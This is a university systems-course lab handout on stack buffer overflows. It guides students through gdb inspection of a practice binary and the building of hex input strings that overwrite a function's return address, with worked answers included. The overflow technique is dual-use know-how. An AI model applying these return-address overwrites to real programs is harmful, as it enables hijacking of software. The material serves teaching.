🔬 Lab
CS 240 Lab 10
Buffer Launch
CS 240 Lab 10
This lab will introduce you to buffer overflow, a common type of security vulnerability. You can design an input to a program which takes advantage (exploits) how the stack is used to call functions. This can cause a program to execute differently from how it was intended to work.
Setup
Open a terminal on cs.wellesley.edu
(e.g., using
VSCode), and start the buffer assignment using:
cd cs240-repos
cs240 start buffer --solo
Create A Cookie
This assignment requires you to have a unique 8-byte “cookie.” We
have provided a Makefile
which has a recipe to create this
cookie.
Go to your buffer directory and open the Makefile
. A
make file can define variables, but mostly consists of “rules.” A rule
starts with a name followed by a colon, possibly with other names after
the colon. Then below that line, it has one or more indented lines of
code composing the body of the rule. Each of these rules does the
following:
- Defines a unique name for the product of the rule (this is the name
part before the colon). This is the file that should be produced by
running the rule body as shell commands. Within the rule body, writing
$@
will refer to the rule product. - Defines which other files should already exist before the rule can
be run (dependencies). These are listed after the colon on the first
line of the rule. The dependency listed first can be referred to in the
rule body as
$<
. - Gives the series of shell commands to execute in order to produce the rule product, assuming the dependencies are all up-to-date. These commands should include one that will produce the rule product file as output.
What make
does is that you give it a rule name, and it
then checks the file creation time for the dependencies for that rule.
If the rule product already exists, and all of the dependency files were
created earlier than the rule product file, make
does
nothing, because that indicates that the rule product file is already
up-to-date. On the other hand, if at least one of the dependencies is
newer than the rule product, it will run the rule body to update the
product file. It also applies this process recursively: when a rule
dependency for one rule is a rule product of another rule, it checks the
freshness of the dependencies of the second rule, and so on and so
forth.
Looking at this Makefile
, answer the following
questions:
Which rule doesn’t have any dependences (give the rule product name)?
Correct answer: id.txt
Run the
cs240 id
command yourself in the shell, without the> $@
part that’s in theMakefile
. Given that>
redirects output into a file, explain whatid.txt
should contain:Example answer: It should contain your username.
Now run
ls
in the shell and see whetherid.txt
exists (it probably doens’t). Then runmake id.txt
in the shell to produce it and check whether you were right.Note: normally
make
prints out each command it executes. An@
in a makefile at the start of a line suppresses this.The rule that produces
cookie.txt
has one dependency. What is it?Correct answer: id.txt
If we run
make cookie.txt
now, willmake
need to run the rule forid.txt
? Why or why not?Example answer: It won’t. Since we just ran
make id.txt
, the rule dependency formake cookie.txt
is already up-to-date, somake
won’t bother to re-run that rule.Which executable file will the
cookie.txt
rule run to produce the cookie file (note that>
in the shell redirects output into a file).Correct answer:
id2cookie.bin
In addition to creating
cookie.txt
, what else does this rule do?Example answer: It commits that file into your
git
repository.The
cookie
rule just prints out your id and cookie. It’s marked as.PHONY
at the bottom of the file because it doesn’t actually produce a file namedcookie
. What would happen if you ranmake cookie
without first runningmake cookie.txt
? Why?Example answer: Since
cookie.txt
is listed as a dependency of thecookie
rule,make
will first check that it is up-to-date. If it doesn’t exist,make
will run thecookie.txt
rule to create it (first running theid.txt
rule if that file is also missing or not up-to-date). So just runningmake cookie
can produceid.txt
andcookie.txt
and will still work to print out the cookie. Make is pretty sweet :)
Now run make cookie
to create and display your cookie.
As we just discussed, this will print your cookie in hex and store your
CS username and cookie in the files id.txt
and
cookie.txt
, respectively.
Contents of Repository
List the contents of the repository (use ls
). You should
see the following files (along with a few others):
laptop.c
: you are given important parts of the C code that you can read to help you understand how the compiled version works. This is similar to how you were given themain.c
code for the x86 assignment to help you understand howadventure.bin
worked.laptop.bin
: compiled/executable version oflaptop.c
. You will runlaptop.bin
using a file containing input to the program. This is similar to how you ranadventure.bin
usinginputs.txt
in the x86 assignment.You will design the input to the program to take advantage of how the stack is used to get the program to do something different that what was originally intended (this is called an exploit).
exploit1.hex
,exploit2.hex
,exploit3.hex
,exploit4.hex
: input files you will write for each of the 4 exploits you will design. These correspond toinputs.txt
for the x86 assignment, except that you use a separate file for each exploit.Each exploit file must contain the correct number of bytes with the correct hexadecimal value for each byte to represent your exploit.
hex2raw.bin
: tool/executable file you are given which helps you prepare to run your exploits. This executable file will take the input you design for an exploit (for example,exploit1.hex
) and turn it into the proper raw byte form (exploit1.bytes
) needed to run the program.responses.txt
: file for English descriptions of your exploits This is similar todescriptions.txt
in the x86 assignment.
Investigate getbuf
Exercise 1:
In the Terminal, open the laptop executable:
gdb ./laptop.bin
Examine the getbuf
function using the list
command:
(gdb) list getbuf
Look for the following three key statements (you may have to hit “enter” to list more lines if they don’t all show up at once):
unsigned long long getbuf() {
char buf[36];
// other statements
unsigned long long val = (unsigned long long)Gets(buf);
// other statements
return val % 40;
}
The function getbuf()
uses buf
, an array of
36 bytes, to calculate a value.
Where will the memory for the buf
array be
allocated?
Example
answer: Since buf
is a local
variable, space for the 36 bytes is allocated on the
stack.
Use disas getbuf
to confirm your answer: which
instruction allocates space for buf
(along with other local
variables of getbuf
):
Correct
answer: sub $0x30,%rsp
Which register actually holds the buf
pointer when
Gets
is called?
Correct
answer: %rdi
The bytes to fill buf
are obtained by calling the
function Gets()
, which has the signature:
char* Gets(char* buf)
where buf
is a pointer to an array of bytes, and the
string read from standard input which supplies the bytes is terminated
by a newline character ('\n'
).
The bytes from the input are stored starting at buf
,
which is an address in the stack.
Gets()
is similar to a C system function called
gets()
, which is not safe to use because it does not check
to see if the string accepted is longer than the size of the array!
What do you think might happen if the string accepted IS longer than the array? Why is this “not safe?”
The extra bytes will be written over stuff beyond the buffer. Since the buffer is on the stack, these bytes will overwrite important other stack information, like the return address of the current function, which could lead to an attacker gaining control of the system.
Fill in the stack diagram and registers below for a call to
getbuf
right before it calls a function Gets
,
using the conventions from class and lab (use disas getbuf
to see the assembly code, you only need to look at the first few lines).
First, fill in as much as you can without using
gdb
, then use gdb
to fill in the rest. Use the
following assumptions:
- Assume the return address is
0x4017e3
. - Assume the value of
%rbp
before the call togetbuf
was0x7fffffffb210
. - Assume the value of
%rsp
before the call togetbuf
was0x7fffffffb1f0
. - For memory slots with known values, fill in hex values starting with
0x
. - For memory slots that are allocated but which haven’t been initialized yet, write ‘X’.
- For memory slots that are below the stack pointer, write ‘-’.
- When running it with
gdb
to print out actual values, userun -u pmwh
to get matching stack addresses. When actually doing the assignment, use your own username instead.
Hint: to fill in these values, simulate the effects of each
instruction, starting with the call getbuf
instruction that
jumps into getbuf
(which isn’t shown as part of
disas getbuf
) and ending with the final instruction before
the call. Consult the lab slides
for reminders about how call
, ret
,
push
, and pop
modify the stack.
Hint 2: The call getbuf
instruction is the
instruction that will determine the value for the first address listed
below.
Address | Value | Comments |
---|---|---|
0x7fffffffb1e8 | Correct
answer: 0x4017e3 |
Example
answer: Return address for
getbuf |
0x7fffffffb1e0 | Correct
answer: 0x7fffffffb210 |
Example
answer: Pushed %rbp
value. |
0x7fffffffb1d8 | Correct answer: X | Example
answer: 16x3 = 48 bytes allocated by
sub . |
0x7fffffffb1d0 | Correct answer: X | |
0x7fffffffb1c8 | Correct answer: X | |
0x7fffffffb1c0 | Correct answer: X | |
0x7fffffffb1b8 | Correct answer: X | |
0x7fffffffb1b0 | Correct answer: X | |
0x7fffffffb0a8 | Correct answer: - | Example answer: Beyond the current stack pointer. |
0x7fffffffb1a0 | Correct answer: - |
Register | Value | Comments |
---|---|---|
Correct
answer: %rsp |
Correct
answer: 0x7fffffffb1b0 |
The stack pointer |
%rbp |
Correct
answer: 0x7fffffffb1e0 |
The stack “base” pointer for the base of our stack frame. |
%rdi |
Correct
answer: 0x7fffffffb1b0 |
Example
answer: Copy of %rsp as first
argument to Gets ; this is buf from the C
code. |
Excluding the 8 bytes for the return address (which is part of
main
’s stack frame), how many total bytes are allocated in
getbuf
’s stack frame?
Correct
answer: 56 Explanation: The push
instruction allocates 8 and
the sub
allocates an additional 0x30
= 3x16 =
48 bytes.
If you haven’t already, set a breakpoint at the instruction that
calls Gets
, and also set one on the instruction following
the call.
(gdb) break *getbuf+12 (gdb) break *getbuf+17
Run the program, using your own username as the argument:
(gdb) run -u your_username
It should stop at your first breakpoint. Which of these commands will display the stack frame plus the return address?
info reg rsp
x /gx $rsp
x /s $rsp
x /8gx $rsp
Run that command and inspect the results. Make sure that the output agrees with your table above.
Remember that you have to read the values in the
opposite order from your diagram, since gdb
displays memory
from lowest to highest address.
Now, continue execution so that you hit the next breakpoint, after Gets has been called. On the way, the program will pause to ask for input. Enter the following 40-byte string:
0123456789012345678901234567890123456789
Now that we’re at the second breakpoint, display the stack frame
again using the same x
command. What is the first 8-byte
value that you see, at the bottom of the stack (start with
0x
)?
Correct
answer: 0x3736353433323130
Explain where that specific value came from:
Example
answer: We typed in digits starting with
01234567
, and each digit is represented by 1 byte. The
ASCII codes for the digits 0-9 are 0x30
-0x39
in hexadecimal, and we interpret multi-byte values as little-endian, so
we get the value shown above by concatenating the ASCII codes for the
first 8 digits we typed.
The buf
variable is only 36 bytes, and the assembly code
for getbuf
uses some of the allocated stack space beyond
those 36 bytes to store the variable_length
variable. Since
we have input more than 36 bytes and Gets
does not check
for that, part of that variable’s memory may be overwritten. Why is that
not an issue?
We
haven’t initialized variable_length
yet and it will get
reset when we do.
The
volatile
keyword protects variable_length
from
being overwritten.
40 input
characters isn’t enough to overwrite variable_length
, since
there’s a gap between the two variables.
That string was 40 bytes long. What will happen if the string is 48 bytes long?
Example
answer: That’s just long enough to fill up
the extra 8-bytes of zeroes, and so the final NUL terminator will
overwrite the last two hex digits of the old %rbp
. If we’re
lucky it’s not actually being used by anyone and we’ll be fine. If not,
other stuff may start to go wrong as the corrupted %rbp
value results in other code writing values into the wrong memory
locations.
What will happen if the string is 56 characters long?
Example
answer: In this case we’d overwrite the old
%rbp
value and corrupt the last byte of the return address.
We’d almost certainly get a segmentation fault or other error when
attempting to return from getbuf
, but literally anything
could happen, since bytes that are probably not aligned with real
instructions will be reinterpreted as instructions to run.
Now quit out of gdb
.
Formatting an
Exploit String with hex2raw.bin
Basically, your job on the assignment is to design strings of various lengths which represent bytes being stored to the stack when they are accepted as input. Some of the bytes are simply “filler,” to fill up the buffer so that it overflows into other values stored on the stack. The filler bytes can be any value.
However, some bytes must be set to particular values so that the stack is corrupted in a way which will cause the program to do something it was not designed to do.
You will create the string representing the bytes in a file, using the format described in the assignment: Each byte in the byte sequence is written as a pair of hexadecimal digits. Successive bytes may be separated by spaces, but all bytes must be on the same line.
Avoid the use of 0A
, which is the
newline character and will cause Gets
to stop reading
input.
Exercise 2:
Use your editor to create a file named exploit0.hex
. You
will enter a string which represents the numbers you want stored to
memory, and then create the raw bytes using hex2raw.bin
(this way you can directly enter your desired bytes, without having to
do a reverse lookup in an ASCII table for each byte to figure out what
to type in).
In exploit0.hex
, enter the following 40 values (these
values are chosen to be easy to recognize when we display memory in
gdb
):
31 31 31 31 31 31 31 f1 32 32 32 32 32 32 32 f2 33 33 33 33 33 33 33 f3 34 34 34 34 34 34 34 f4 35 35 35 35 35 35 35 f5
Note: You must specify a pair of digits in the
.hex
file to represent each byte, e.g., 01
02
03
, etc.
Create the raw bytes in the .bytes
file from the
.hex
file by entering at the command line:
./hex2raw.bin < exploit0.hex > exploit0.bytes
(Note that we’re using the <
and >
shell operators we saw earlier to read input from a file and redirect
output to a file.)
Start the debugger again, and set a breakpoint at the instruction
after the Gets
call in getbuf
:
(gdb) break *getbuf+17
What gdb
command (using your_username
as
the username and <
to read input from a file) will run
the program using the raw .bytes
file you just created as
input?
run -u yourusername < ./exploit0.bytes
Run that command, and gdb
should stop at the breakpoint
you set up. Examine the stack:
(gdb) x /8gx $rsp
Display the results, and explain what you see as compared to the last time when we entered digits manually:
This time we see what we wrote in the .hex
file directly
reflected in memory, since hex2raw.bin
has done the reverse
ASCII
lookup for us for each pair of hex digits we
entered.
Overwrite the return address
Assume that you want to replace the return address for the
getbuf
call on the stack with the address
0x0000000000400e45
(NOTE: this is not the correct value to
use for any of the exploits).
Exercise 3:
How many bytes of input would you need in total?
Example answer: 64 bytes to overwrite the entire return address, which will also corrupt one byte beyond it in the stack. 63 bytes is probably enough since the high-order bytes of most return addresses you’d want to use (including text-segment and stack addresses) will be 0. In this specific case, we only need to overwrite the 3 least-significant bytes of the return address since the rest are identical to what’s already there (and zeroes so the NUL won’t be noticed), so 59 bytes is enough.
Modify your
exploit0.hex
string to accomplish this and display the contents of your file below:Example answer:31313131313131f1 32323232323232f2 33333333333333f3 34343434343434f4 35353535353535f5 36363636363636f6 37373737373737f7 450e4000000000
Note: this answer uses spaces every 8 hex values to make it easier to count out the bytes. It also uses exactly 63 bytes so that it overwrites the entire 8-byte return address when you count the trailing NUL byte that gets added automatically. Your answer can mostly contain ANY bytes you want, as long as there are the right number of them before the
45
,0e
and40
.
Now create the raw bytes in the .bytes
file from the
.hex
file by entering at the command line:
./hex2raw.bin < exploit0.hex > exploit0.bytes
Note that you can run terminal commands without
having to quit out of gdb
and set up your breakpoints again
by typing !
within gdb
followed by the
terminal command. You could also just open up a second terminal to run
commands alongside gdb
.
If you need to, start gdb
again and set up the
breakpoint after the Gets
call in getbuf
.
Run the program using the raw bytes file and examine the stack:
(gdb) run -u your_username < ./exploit0.bytes
... (gdb) x /8gx $rsp
Confirm that you have successfully overwritten the return address by entering the last 8-byte hex value displayed by that command:
Correct
answer: 0x0000000000400e45
Run disas 0x400e45
to display the code that’s at the
return address we just set up. Based on the result you see, what do you
think will happen when we continue to execute the program in
gdb
?
Example
answer: gdb
just says “No
function contains the specified address.” Since the address isn’t code,
it’s most likely going to be in a different segment which will not be
marked as executable, and so we’ll get a segmentation fault when we
continue.
Use c
to continue in gdb
and confirm your
prediction.
The usage
function defined in laptop.c
offers a way to exit the program cleanly, since it ends up calling
exit
rather than simply returning. Use disas
to figure out what return address we should use if we want to jump
straight to the exit
call within the usage
function when we’re done with getbuf
(write down the
address starting with 0x
but omitting leading 0s):
Correct
answer: 0x4014bf
Explanation: Note that 0x4014bd
is also a
reasonable choice as that would set the argument to exit
to
0 first.
Edit your exploit0.hex
to use this return address value,
run hex2raw.bin
to create a new
exploit0.bytes
, and run the program. Confirm that it exits
normally if you continue past your breakpoint.
NOTE: Although this lab contains essential details for Buffer, you should also read the assignment carefully, since it contains additional information not included in the lab exercises.
You are ready to begin working on exploit 1 on the assignment. Use remaining lab time to start working on the assignment.